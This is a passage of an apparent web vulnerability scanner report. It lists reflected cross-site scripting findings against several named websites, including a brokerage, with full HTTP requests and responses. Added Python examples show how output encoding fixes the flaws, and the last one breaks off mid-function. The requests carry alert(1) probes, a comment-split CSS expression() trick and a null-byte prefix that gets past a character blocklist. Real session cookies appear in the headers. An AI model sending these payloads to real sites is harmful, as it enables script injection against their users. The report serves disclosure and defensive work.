This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC closes the value attribute and adds a style attribute whose dynamically evaluated expression() runs JavaScript; the keyword is split with a /**/ comment, which CSS ignores, so a naive keyword filter would not match it. Note that CSS expressions are specific to older versions of Internet Explorer and do not work in other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /?page=login&cmd=start_reg HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=register
Cache-Control: max-age=0
Origin: http://www.afreshbunch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.2.10.1303778640
Content-Length: 589

email=sa94115%40gmail.com724aa"style%3d"x%3aexpr/**/ession(alert(1))"0d3fc4acadb&password=123456&password1=123456&username=asdfgh&b_month=1&b_day=1&b_year=1996&recaptcha_challenge_field=03AHJ_VuvPoN7XCRMiDNl_e1-gKQxdcJE6t2XSOLpLWb79sCwjRxcelAxYlvgrbXoUo5he3r2H3-AeU5VL2w10Dnv0VVa8
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29517
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:51:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:52:09 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<input name="email" size="30" value="sa94115@gmail.com724aa"style="x:expr/**/ession(alert(1))"0d3fc4acadb">
...[SNIP]...

4.44. http://www.afreshbunch.com/files/com/call.asp [instance_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the instance_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1b1"><script>alert(1)</script>2abb0614564 was submitted in the instance_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the HTTP 500 error page, which copies the full request URL into a hidden form field, so the vulnerable context is reached even though the stats call itself fails.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D7483b1b1"><script>alert(1)</script>2abb0614564&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fpage%3Dlogin%26cmd%3Dstart%5Freg&loadtime=0.28 HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.2.10.1303778640

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1487
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:47:21 GMT


<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../system/error.css" />
</head>
<body>
30
<script>
function checkcomment(objValue)
{

if(ev
...[SNIP]...
<input type="hidden" name="page" value="http://www.afreshbunch.com//files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D7483b1b1"><script>alert(1)</script>2abb0614564&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fpage%3Dlogin%26cmd%3Dstart%5Freg&loadtime=0.28">
...[SNIP]...

4.45. http://www.afreshbunch.com/files/com/call.asp [lastpage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the lastpage request parameter is copied into the HTML document as plain text between tags. The payload 70f69<script>alert(1)</script>13cb3a90beb was submitted in the lastpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Although the body looks like commented-out JavaScript (//document.write(...)), it is served as text/html and is not inside a <script> element, so the browser treats the // lines as ordinary text and parses the injected <script> element as markup.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fcachecommand%3Dbypass70f69<script>alert(1)</script>13cb3a90beb&loadtime=0.55 HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: site=referring%5Fsite=; ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 277
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:47:22 GMT


//document.write("<textarea>/Default.asp?page=loginbf6df%2522%2520a%253db%25206e68fa8c6ae&cmd=approval&a=1</textarea>")
//document.write("<br><textarea>/Default.asp?cachecommand=bypass70f69<script>alert(1)</script>13cb3a90beb</textarea>
...[SNIP]...

4.46. http://www.directbrand.com/tracking202/static/landing.php [lpip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/landing.php

Issue detail

The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d39c'%3balert(1)//86fb6401f85 was submitted in the lpip parameter. This input was echoed as 8d39c';alert(1)//86fb6401f85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking202/static/landing.php?lpip=923178d39c'%3balert(1)//86fb6401f85 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 3186
Connection: close
Content-Type: text/html

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '923178d39c';alert(1)//86fb6401f85';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');
   var
...[SNIP]...

4.47. http://www.directbrand.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/landing.php

Issue detail

The scanner attributes this reflection to the name of an arbitrarily supplied request parameter, but the request shown places the payload inside the value of lpip (after 9/), so it is the same single-quoted JavaScript string sink as 4.46. The payload 89acf'%3balert(1)//3bd7e7a69f was submitted and was echoed as 89acf';alert(1)//3bd7e7a69f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking202/static/landing.php?lpip=9/89acf'%3balert(1)//3bd7e7a69f2317 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 3186
Connection: close
Content-Type: text/html

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '9/89acf';alert(1)//3bd7e7a69f2317';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');

...[SNIP]...

4.48. http://www.genbook.com/bookings/booknowjstag.action [bookingSourceId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genbook.com
Path:   /bookings/booknowjstag.action

Issue detail

The value of the bookingSourceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9769d'%3balert(1)//7010dea1bfa was submitted in the bookingSourceId parameter. This input was echoed as 9769d';alert(1)//7010dea1bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa HTTP/1.1
Host: www.genbook.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:44:31 GMT
Server: Jetty(6.1.21)
Content-Type: text/javascript; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5eplc07ccf1y.cb1;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 904


var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck
...[SNIP]...
<a href="http://www.genbook.com/bookings/slot/reservation/30134654?bookingSourceId=10009769d';alert(1)//7010dea1bfa" target="_blank">
...[SNIP]...
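
The two kinds of sink above, a value inside a double-quoted HTML attribute (4.43, 4.44) and a value inside a single-quoted JavaScript string (4.46 to 4.48), are fixed by encoding for the context at the point of output rather than by filtering the input. The following is an added example written for this page; it is not code from any of the scanned sites or from the scanner. The two template strings and the variable name lpip are assumptions modelled on the response snippets above. It renders each payload from the report through a vulnerable template and a hardened one, then uses a tolerant HTML parser and a small quote scanner to show that the hardened output keeps the payload inside its attribute or string literal. The plain-text context of 4.45 is handled by the same html.escape call without quote=True.

```python
"""Context-aware output encoding for the attribute and JS-string sinks above.

Added example for this page; not code from the scanned sites or the scanner.
The two templates and the name lpip are assumptions modelled on 4.43/4.44
and 4.46 to 4.48.
"""
import codecs
import html
import string
from html.parser import HTMLParser

# Probes as the report shows them being echoed (4.44, 4.43, 4.46).
ATTR_BREAKOUT = '3b1b1"><script>alert(1)</script>2abb0614564'
ATTR_EXPRESSION = '724aa"style="x:expr/**/ession(alert(1))"0d3fc4acadb'
JS_BREAKOUT = "8d39c';alert(1)//86fb6401f85"

_ALNUM = set(string.ascii_letters + string.digits)


# --- HTML attribute context -------------------------------------------------
def render_input_vulnerable(value):
    """Raw concatenation (the 4.43/4.44 pattern): a " in value ends the attribute."""
    return '<input name="email" size="30" value="%s">' % value


def render_input_hardened(value):
    """html.escape(quote=True) rewrites & < > " ' as entities, so the value can
    neither close the attribute nor open a tag; the browser decodes them back."""
    return '<input name="email" size="30" value="%s">' % html.escape(value, quote=True)


class _TagCollector(HTMLParser):
    """Records every start tag the tolerant parser sees, with its attributes."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """[(tagname, {attr: value}), ...] as html.parser reads the markup."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


# --- JavaScript single-quoted string context ---------------------------------
def render_js_vulnerable(value):
    """Raw concatenation (the 4.46 pattern): var lpip = '<value>';"""
    return "var lpip = '%s';" % value


def encode_for_js_string(value):
    """Escape every character outside [A-Za-z0-9] as \\xHH or \\uHHHH (astral
    characters as a surrogate pair). Quotes, ; ( ) / and < > (which could
    otherwise form </script>) all become inert escape sequences."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch in _ALNUM:
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02x" % cp)
        elif cp <= 0xFFFF:
            out.append("\\u%04x" % cp)
        else:
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
    return "".join(out)


def decode_js_string(escaped):
    """Undo encode_for_js_string; its output is pure ASCII, so unicode_escape is
    exact, and re-pairing surrogates restores astral characters."""
    text = codecs.decode(escaped.encode("ascii"), "unicode_escape")
    return text.encode("utf-16", "surrogatepass").decode("utf-16")


def render_js_hardened(value):
    """Same statement shape as the vulnerable one, with the value escaped."""
    return "var lpip = '%s';" % encode_for_js_string(value)


def js_literal_intact(statement):
    """True if the single-quoted literal in "var x = '...';" reaches the closing
    quote of the statement, i.e. nothing in the value terminated it early."""
    i = statement.index("'") + 1
    while i < len(statement):
        if statement[i] == "\\":   # escape sequence: skip the escaped character
            i += 2
        elif statement[i] == "'":
            return statement[i:] == "';"
        else:
            i += 1
    return False
```

The parser check is the useful part for review work: feeding the vulnerable rendering of the 4.43 payload to html.parser yields an extra style attribute, and the 4.44 payload yields a second start tag (script); the hardened rendering of either yields one input tag whose value attribute decodes back to the original payload. The JavaScript encoder deliberately escapes more than the quote character, because the same value often ends up inside an inline <script> block where a bare </script> would end the block regardless of the string delimiter.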

4.49. http://www.merrilledge.com/M/WebResource.axd [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /M/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0011ed5'-alert(1)-'ced209a762a was submitted in the d parameter. This input was echoed as 11ed5'-alert(1)-'ced209a762a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%0011ed5'-alert(1)-'ced209a762a&t=634335774686696206 HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=...[SNIP]...; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id
...[SNIP]...
<script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('cdd93d9b-236f-4d83-88ef-18c94a3729cb', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%0011ed5'-alert(1)-'ced209a762a&t=634335774686696206', "Invalid viewstate.");</script>
...[SNIP]...

4.50. http://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0028c00"><script>alert(1)</script>51f61b3f956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28c00"><script>alert(1)</script>51f61b3f956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /m/pages/global-oao.aspx?%0028c00"><script>alert(1)</script>51f61b3f956=1 HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.28c00"><script>alert(1)</script>51f61b3f956=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

4.51. https://www.merrilledge.com/M/WebResource.axd [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /M/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00da6ca'-alert(1)-'2461730ea55 was submitted in the d parameter. This input was echoed as da6ca'-alert(1)-'2461730ea55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%00da6ca'-alert(1)-'2461730ea55&t=634335774460333397 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
Referer: https://www.merrilledge.com/m/pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id
...[SNIP]...
<script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('7359dd1a-7ee0-4a0b-9a37-57a4db53bd63', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%00da6ca'-alert(1)-'2461730ea55&t=634335774460333397', "Invalid character in a Base-64 string.");</script>
...[SNIP]...

4.52. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dfd72"><script>alert(1)</script>3b54af6fcbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfd72"><script>alert(1)</script>3b54af6fcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /m/pages/home.aspx?%00dfd72"><script>alert(1)</script>3b54af6fcbc=1 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=d6abc9104d8440bf81099a8ffa6cf434; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.dfd72"><script>alert(1)</script>3b54af6fcbc=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...
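
The four Merrill Edge findings above (4.49 to 4.52) all get past a character blocklist by prefixing the probe with %00. The report does not say how the filter is implemented; the model below, a filter that stops scanning at the first NUL byte the way a C string routine would, while the page uses the fully decoded value, is an assumption chosen only because it reproduces the observed behaviour. The example is added here and is not code from the site or the scanner; the sink string is modelled on the href in the 4.50 response and the parameter name is the one from that request. It shows the bypass, why applying the same blocklist to the whole string is only a partial fix, and the hardened handling: reject control characters after decoding and encode for the URL and attribute contexts on output.

```python
"""Why a %00 prefix gets past the character blocklist seen in 4.49 to 4.52.

Added example for this page, not code from the site or the scanner. The filter
model (stops scanning at the first NUL byte, like a C string routine, while
the page uses the fully decoded value) is an assumption that reproduces the
behaviour the report describes; the sink is modelled on the href in 4.50.
"""
import html
from urllib.parse import quote, unquote

BLOCKED = set('<>"\'')   # the kind of blocklist the report says is in place

# Parameter name from the 4.50 request, with and without the NUL prefix.
CLEAN_NAME = '28c00"><script>alert(1)</script>51f61b3f956'
BYPASS_NAME = "%00" + CLEAN_NAME


def decode_param(raw):
    """Percent-decode a query-string token the way the server will see it."""
    return unquote(raw)


def blocklist_c_style(decoded):
    """Assumed vulnerable filter: only inspects the text before the first NUL."""
    visible = decoded.split("\x00", 1)[0]
    return not any(ch in BLOCKED for ch in visible)


def blocklist_full(decoded):
    """The same blocklist over the whole value. Closes the NUL trick but is
    still a blocklist: anything not on the list goes straight through."""
    return not any(ch in BLOCKED for ch in decoded)


def render_vulnerable(decoded):
    """The 4.50 sink: the name is written raw into the search link's href.
    The report shows the NUL itself is not echoed, so it is dropped here."""
    return '<a href="../System/SearchResults.aspx?.%s=1&k=">' % decoded.replace("\x00", "")


def handle_request(raw_name, filter_fn, renderer):
    """Returns the rendered HTML, or None when the filter rejects the request."""
    decoded = decode_param(raw_name)
    if not filter_fn(decoded):
        return None
    return renderer(decoded)


# --- hardened handling ---------------------------------------------------------
def validate(decoded):
    """Reject NUL and every other C0/DEL control character outright, and bound
    the length. Runs after decoding, on the exact string the sink will use."""
    if len(decoded) > 64:
        return False
    return not any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded)


def render_hardened(decoded):
    """Encode for both contexts at the point of output: percent-encode because
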